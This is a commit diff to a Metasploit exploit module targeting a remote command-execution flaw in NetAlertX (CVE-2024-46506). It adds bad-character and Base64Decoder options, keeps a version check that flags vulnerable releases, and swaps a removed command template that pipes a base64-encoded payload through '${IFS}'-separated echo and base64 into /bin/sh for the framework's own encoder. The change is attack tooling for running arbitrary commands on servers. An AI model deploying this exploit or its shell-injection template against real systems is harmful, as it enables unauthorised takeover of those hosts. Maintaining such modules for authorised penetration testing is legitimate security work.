Use BadChars and Base64Decoder

Author: Takahiro-Yoko

modules/exploits/linux/http/netalertx_rce_cve_2024_46506.rb

@@ -41,6 +41,9 @@ def initialize(info = {})
           ],
         ],
         'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => ' \'\\'
+        },
         'DisclosureDate' => '2025-01-30',
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
@@ -57,6 +60,11 @@ def initialize(info = {})
         OptBool.new('CLEANUP', [false, 'Restore DBCLNP_CMD to original value after execution', true])
       ]
     )
+    register_advanced_options(
+      [
+        OptString.new('Base64Decoder', [true, 'The binary to use for base64 decoding', 'base64-short', %w[base64-short] ])
+      ]
+    )
   end
 
   def check
@@ -73,7 +81,6 @@ def check
     return Exploit::CheckCode::Unknown('Failed to get version element.') if version_element.blank?
 
     version = Rex::Version.new(version_element.text&.strip&.sub(/^v/, ''))
-
     return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.") unless version.between?(Rex::Version.new('23.01.14'), Rex::Version.new('24.9.12'))
 
     Exploit::CheckCode::Appears("Version #{version} detected.")
@@ -84,7 +91,7 @@ def exploit
     # subprocess.check_output(command, universal_newlines=True, stderr=subprocess.STDOUT, timeout=(set_RUN_TIMEOUT))
     # https://github.com/jokob-sk/NetAlertX/blob/v24.9.12/server/plugin.py#L206
     # https://github.com/jokob-sk/NetAlertX/blob/v24.9.12/server/plugin.py#L214
-    cmd = "/bin/sh -c echo${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|/bin/sh"
+    cmd = "/bin/sh -c #{payload.encode}"
     update_settings(cmd, '*')
     # Not updated immediately
     print_status('Waiting for the settings to be properly updated...')